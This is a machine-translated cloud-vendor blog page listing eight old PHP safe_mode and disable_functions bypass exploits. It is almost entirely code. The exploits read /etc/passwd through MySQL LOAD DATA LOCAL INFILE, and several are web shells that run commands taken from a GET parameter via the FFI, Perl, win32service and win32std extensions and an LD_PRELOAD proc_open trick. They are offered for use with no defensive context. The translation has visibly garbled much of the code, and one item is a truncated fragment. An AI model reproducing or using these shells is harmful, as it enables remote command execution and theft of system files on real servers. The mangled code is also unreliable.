PHP SAFE MODE BYPASS

Last Update:2015-04-28 Source: Internet

Author: User

Tags ffi ioncube

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

1-php <= 4.4.7/5.2.3 mysql/mysqli Safe Mode Bypass Vulnerability

<?phpfile_get_contents ('/etc/passwd '); $l = mysql_connect ("localhost", "root"), mysql_query ("Create DATABASE a"), mysql_query ("Create TABLE a.a (a varchar (1024) )"); mysql_query ("GRANT Select,insert on A.A to ' aaaa ' @ ' localhost '); Mysql_close ($l); mysql_connect ("localhost", "AAAA"); mysql_query ("LOAD DATA LOCAL INFILE '/etc/passwd ' into TABLE a.a"); $result = mysql_query ("Select a From A.A"); while (list ($row) = Mysql_fetch_row ($result)) print $row. Chr (?>);

2-mysql

<?phpfunction R ($fp, & $buf, $len, & $err) {print fread ($fp, $len);} $m = new mysqli (' localhost ', ' aaaa ', ', ' a ‘); $m->options (Mysqli_opt_local_infile, 1); $m->set_local_infile_handler ("R"); $m->query ("LOAD DATA LOCAL INFILE '/etc/passwd ' into TABLE a.a"); $m->close ();?>

3-php FFI Extension safe_mode Bypass Exploit

<?php if (!extension_loaded (' ffi ')) die (' error:ffi extension are not loaded! '); $command = (Empty ($_get[' cmd ')))? ' Dir ': $_get[' cmd ']; if (Is_writeable (DirName (__file__))) $tmp =dirname (__  file__); ElseIf (Is_writeable (Ini_get (' Session.save_path ') )) $tmp =ini_get (' Session.save_path '); ElseIf (is_writeable (Ini_get (' Upload_tmp_dir '))) $tmp =ini_get (' Upload_tmp_dir '); Else die (' Error:move exploit to writeable folder. '); $output = "$tmp \ \". Uniqid (' NJ '); $api =new ffi ("[lib= ' Kernel32.dll '] int winexec (char *app,int SW);"); $res = $api->winexec ("cmd.exe/c $command >\" $output \ "", 0); while (!file_exists ($output)) sleep (1); $con = "; $FP =fopen ($output, ' R '); while (!feof ($FP)) $con. =fgets ($FP, 1024); Fclose ($FP); $con =htmlspecialchars ($con); echo "<pre> $con </pre>"; Unlink ($output);?>

4-php 5.2.4 ioncube extension safe_mode and disable_functions protections Bypas

$MyBoot _ioncube = Ioncube_read_file ($path. " Boot. ini "); echo $MyBoot _readfile; echo "<br><br>ioncube output:<br><br>"; echo $MyBoot _ioncube;?>

5–php Perl Extension Safe_mode Bypass

<?php if (!extension_loaded (' Perl ')) Die (' Perl extension are not loaded '); if (!isset ($_get)) $_get=& $HTTP _get_vars; if (Empty ($_get[' cmd '))) $_get[' cmd ']= (Strtoupper (substr (php_os,0,3)) = = ' WIN ')? ' Dir ': ' ls  '; $perl =new Perl (); echo "<textarea rows= ' cols= ' >"; $perl->eval ("System ('". $_get[' cmd ') ."‘)"); echo "</textarea>"; $_get[' cmd ']=htmlspecialchars ($_get[' cmd '); echo "<br><form>cmd: <input type=text name=cmd value= '". $_get[' CMD ']. "' Size=25></form> '?" >

6-php 5.x (win32service) Local Safe Mode Bypass Exploit

<?php $command = (isset ($_get[' cmd '))) $_get[' cmd ']: ' dir '; #cammand $dir =ini_get (' Upload_tmp_dir '); #Directory to store command's output if (!extension_loaded (' Win32service ')) die (' win32ser  Vice extension not found! '); $name = $dir. " \ \ ". Uniqid (' NJ '); $n =uniqid (' NJ '); $cmd = (Empty ($_server[' ComSpec '))? ' D:\\windows\\system32\\cmd.exe ': $_server[' ComSpec ']; Win32_create_service (' service ' = $n, ' Display ' + $n, ' path ' = ' $cmd, ' params ' = '/'/' $command >\ ' $ Name\ "")); Win32_start_service ($n); Win32_stop_service ($n); Win32_delete_service ($n); $exec =file_get_contents ($name); Unlink ($name); echo "<pre>". Htmlspecialchars ($exec). " </pre> ";?>

7–php 5.2.3 win32std extension safe_mode and disable_functions protections Bypass

<?php if (!extension_loaded ("win32std")) Die ("win32std extension required!"); System ("cmd.exe"); Just to being sure that protections work well win_shell_execute (". \\.. \\.. \\.. \\windows\\system32\\cmd.exe ");?>

8-php Safe_mode Bypass via Proc_open () and custom Environmen

<?php$path= "/var/www"; Change to your writable path $a =open ($path. " /.comm "," w "); Fputs ($a, $_get["C"]); Fclose ($a); $descriptorspec = Array (  0--> Array ("Pipe", "R"),  1 =&gt; Array ("File", $path. " /output.txt "," W "),  2 =&gt; Array (" File ", $path." /errors.txt "," a "); $cwd = '. '; $env = Array (' Ld_preload ' =&gt; $path. " /a.so "); $process = Proc_open (' id &gt;/tmp/a ', $descriptorspec, $pipes, $CWD, $env); Example Command-should not succeed sleep (1); $a =fopen ($path. " /.comm1 "," R "); echo "<strong>"; while (!feof ($a)) {$b =fgets ($a); echo $b;} fclose ($a); >

PHP SAFE MODE BYPASS

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More